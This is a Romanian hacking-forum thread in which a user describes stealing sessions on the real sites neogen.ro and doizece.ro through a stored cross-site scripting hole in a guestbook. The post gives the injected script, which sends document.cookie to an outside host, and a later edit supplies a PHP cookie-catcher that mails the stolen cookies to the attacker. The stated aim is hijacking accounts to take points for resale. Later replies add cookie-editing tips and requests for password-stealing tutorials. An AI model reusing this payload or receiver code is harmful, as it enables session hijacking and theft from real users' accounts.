[url]http://www.neogen.ro[/url] (inclusiv doizece.ro) weakness - Cookie

[Guest Nemessis]

In primul rand vreau sa specific ca am descoperit aceasta modalitate datorita stresurilor de la mine de la sala care ma bateau la cap sa le fac si lor rost de niste puncte pe doizece.ro ca sa le vanda sau sa ceara credite telefonice in schimbul lor. Daca nu erau ei sa ma bata la cap zilnic nu imi pierdeam timpul cu idiotenia asta de site.

Compunerea mea de absolvire a scolii generale:

http://www.doizece.ro apartine de reteaua http://neogen.ro si face parte din serviciile asigurate de catre aceasta retea. Toate serviciile asigurate de catre neogen pot fi accesate de catre vizitatori folosind un singur user, valabil pentru toate. De aici mi-a venit ideea de a folosi mai multe servicii neogen pentru a-mi atinge scopul (accesarea conturilor fara a fi nevoie de parola).

Prima data m-am gandit sa incerc un xss attack folosindu-ma de catre sistemul lor de mesagerie privata. Problema de care m-am lovit a fost ca tagurile de orice fel erau oprite din start de catre filtrele lor. Asa ca....

http://sites.neogen.ro este un alt serviciu asigurat de catre reteaua neogen. Guestbook-ul implementat automat de catre ei pentru cei care au paginile hostate pe acest server este foarte buggy (de cacat daca imi permiteti sa spun asta). Acest fenomenal tip de guestbook permite ORICARUI SCRIPT sa ruleze prin simpla introducere a acestuia in formularul de trimitere a mesajelor. Deci ce este de facut? Simplu ca buna ziua. Am introdus urmatorul script pe un guestbook: <script>location.href='http://www.qode.org/qookie/qookie.php?email=mumu@yahoo.com&cookie='+escape(document.cookie)</script> .

Urmatorul pas pentru a proba daca functioneaza metoda a fost sa ma loghez pe un user de doizece iar dupa logare sa introduc in browser linkul catre guestbook. Surpriza!!! Am primit cookie de la sesiunea mea ceea ce imi permite sa ma loghez pe acel cont fara a mai avea nevoie de parola si sa am acces la toate serviciile neogen.ro (inclusiv faimosul, minunatul, fenomenalul, imperialul, faraonicul, iredutabilul, www.doizece.ro).

Bug-ul functioneaza si pe Firefox si pe IE (presupun ca si pe alte browsere).

ATENTIE

- nu ma intrebati cum se introduc cookies in Firefox pentru ca nu am stat sa imi mai bat capul si cu tampenia asta.

- la IE trebuie ca linkul catre guestbook-ul ce contine scriptul ce fura cookie sa fie introdus in bara de adrese de pe pagina pe care sunteti logati. Daca deschideti o noua pagina nu veti primi nimic. Pe Firefox s-ar putea sa functioneze indiferent de pagina in care introduceti linkul.

- pentru a seta scriptul sa primiti cookie in mailul vostru schimbati doar adresa de mail pe care o contine scriptul.

Nu am stat sa pun la punct un sistem mai usor de a fura cookie-urile acestui site. Am descoperit totul acum 40 minute asa ca daca aveti idei mai bune pentru a perfectiona metoda va invit sa le postati aici macar pentru a putea ajuta pe sarmanii oameni care dau milioane de lei pe niste puncte gratuite .

Discovered by Nemessis - The Legion of Devil

[move]- ONLY FOR RST - ONLY FOR RST - ONLY FOR RST - ONLY FOR RST - ONLY FOR RST - ONLY FOR RST -[/move]

MODIFICAT NEMESSIS 11-09-2006:

Linkul din script este mort. Domeniul acela a fost inchis. Va dau scriptul php pentru a fi urcat de catre voi pe hostingul propriu:

<?php

## Qookie By [Qode]

## http://www.rst-crew.net

$myemail = $_GET['email'];

$cookie = $_GET['cookie'];

$today = date("l, F j, Y, g:i a") ;ÂÂÂÂ*

$subject = "Qookie [by Qode]" ;ÂÂÂÂ*

$message = "Qookie [by Qode]n http://www.rst-crew.netnnDate: $today nnCookie: n$cookie nnQookie [by Qode]n http://www.qode.org";

$from = "From: Qookie<qookie@doizece.ro>rn";ÂÂÂÂ*

mail($myemail, $subject, $message, $from);ÂÂÂÂ*

echo "<meta http-equiv='refresh' content='1;url=http://www.doizece.ro>";

?>ÂÂÂÂ*

[MiniDisc]

bv Nemessis ,tot neogenu e plin de xss sau alte vulnerabilitati o sa vb cu kw3rln sa postez ceva tare la vip , legat de 210

[Guest Nemessis]

Ar fi interesant si educativ .

[DJAx3L]

pentru cookie editor la mozilla intrati pe www.mozilla.com si e search scrieti cookie si voila

[wvw]

Oamni buni eu caut aici de cateva ore... si tot nu vad sa fi pus cineva un tutorial sau ceva sa putem sa ne dam puncte pe doizece sau sa furam parole ce ziceti nu isi ia nimeni 5 minute din timpu liber sa posteze un tutorial vidoe sa ne arate si noua celor care nu stiu si care sunt foarte recunoscatori pentru acesta?

Stii sa citesti? Da? Nu...

In plus,

[Chita]

Stii sa citesti? Da? Nu...

Ma refeream la un tutorial video

[Chita]

Deci sunt cam habarnist si ma roade fffffffoarte tare sa ma apuc si sa invat am rabdare si tot doar daca ar putea cineva sa ma ajute si sa imi dea un link unde sa gasesc tutoriale si tot ce trebe sa invat calea corecta de la 0? va rog frumos

[cmiN]

Mai mult iti trebuie experienta ... nu ai ce sa inveti aici la topicul asta de la 0.

Oricum nu cred ca mai merge ceva de aici :/.

May the google be with you!

[Chita]

Mai mult iti trebuie experienta ... nu ai ce sa inveti aici la topicul asta de la 0.

Oricum nu cred ca mai merge ceva de aici :/.

May the google be with you!

eh nu ma refeream la topicul asta ma refeream in general la exploituri cam de unde ash putea sa intru sa invatz ca sunt cam pe dinafara...

[wvw]

Kids these days... intai inveti programare, pe urma discutam.

Si citeste asta de o suta de ori: http://www.catb.org/~esr/faqs/hacker-howto.html

Spor.

@mods: lock.

[Chita]

Kids these days... intai inveti programare, pe urma discutam.

Si citeste asta de o suta de ori: http://www.catb.org/~esr/faqs/hacker-howto.html

Spor.

@mods: lock.

Ms frumos sunt recunoscator